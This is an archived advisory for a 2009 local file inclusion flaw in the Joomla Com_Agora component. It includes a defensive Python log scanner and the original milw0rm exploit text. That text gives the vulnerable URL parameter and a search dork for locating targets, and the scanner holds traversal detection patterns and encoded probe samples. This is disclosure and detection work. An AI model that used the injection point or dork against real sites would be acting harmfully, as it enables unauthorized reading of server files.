Vendor: Component Com_Agora
By: ByALBAYX
CVSS: 7,5 (HIGH)
Type: Local File Inclusion
CWE: 98
Product Name: Component Com_Agora
Affected Version From: 3.0.0b
Affected Version To: 3.0.0b
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Joomla Component Com_Agora Local File Inclusion Vulnerability

A vulnerability in Joomla Component Com_Agora allows an attacker to include local files on the server. This vulnerability is due to insufficient sanitization of user-supplied input to the 'page' parameter in the 'index.php' script when handling requests to the 'com_agora' component. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable script. Successful exploitation will result in arbitrary local file inclusion.

Mitigation:

Upgrade to the latest version of Joomla Component Com_Agora.
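
As an added example (not part of the original advisory or the component's code), this Python script scans web server access logs for com_agora requests whose 'page' or 'action' parameter decodes to a path-traversal, absolute-path, null-byte or URL-scheme value, so probing can be spotted while the upgrade is pending. The Combined Log Format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Parameters named on this page: 'page' (description) and 'action' (PoC URL).
WATCHED_PARAMS = ("page", "action")
# Combined Log Format request field (assumed): "METHOD /path?query HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markers a legitimate page/action name never needs:
# traversal, leading slash, null byte, URL scheme.
SUSPICIOUS_RE = re.compile(r"\.\.[/\\]|^[/\\]|\x00|^[a-z][a-z0-9+.-]*://", re.I)

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %252e -> %2e -> '.')."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_agora_params(log_line):
    """Return [(param, decoded_value)] for com_agora requests that look like LFI probes."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    # parse_qs decodes one layer; fully_decode handles double encoding.
    query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if "com_agora" not in query.get("option", []):
        return []
    hits = []
    for name in WATCHED_PARAMS:
        for raw in query.get(name, []):
            value = fully_decode(raw)
            if SUSPICIOUS_RE.search(value):
                hits.append((name, value))
    return hits

# Constructed sample log lines (documentation-range IPs, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Sep/2009:10:00:00 +0000] "GET /index.php?option=com_agora&task=profile&page=avatars HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Sep/2009:10:00:05 +0000] "GET /index.php?option=com_agora&task=profile&page=avatars&action=..%2F..%2Fplaceholder HTTP/1.1" 200 312',
    '192.0.2.77 - - [01/Sep/2009:10:00:09 +0000] "GET /index.php?option=com_agora&task=profile&page=%252e%252e%252fplaceholder HTTP/1.1" 200 298',
    '192.0.2.31 - - [01/Sep/2009:10:01:00 +0000] "GET /index.php?option=com_content&view=article&id=..%2F HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for name, value in suspicious_agora_params(line):
            print(f"possible LFI probe in '{name}': {value!r}")
```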

Exploit-DB raw data:

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------
@~~=Author   : ByALBAYX
                              
@~~=Website  : WWW.C4TEAM.ORG
---------------Ooooo-------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)

@~~=May the holy Ramadan of the entire Islamic world be blessed.

@~~=======================================~~@
@~~=Script   : Joomla Component Com_Agora

@~~=S.Site   : http://joomlame.com
@~~=======================================~~@

@~~=Vuln

             : http://c4team.org/ [Yol] /index.php?option=com_agora&task=profile&page=avatars&action=  [-LFI-]

@~~=Dork

             :Powered by Agora 3.0.0b

@~~=Demo


@~~=Etc.. Etc.. Etc..
@~~=======================================~~@

@~~=ByALBAYX :/

# milw0rm.com [2009-09-01]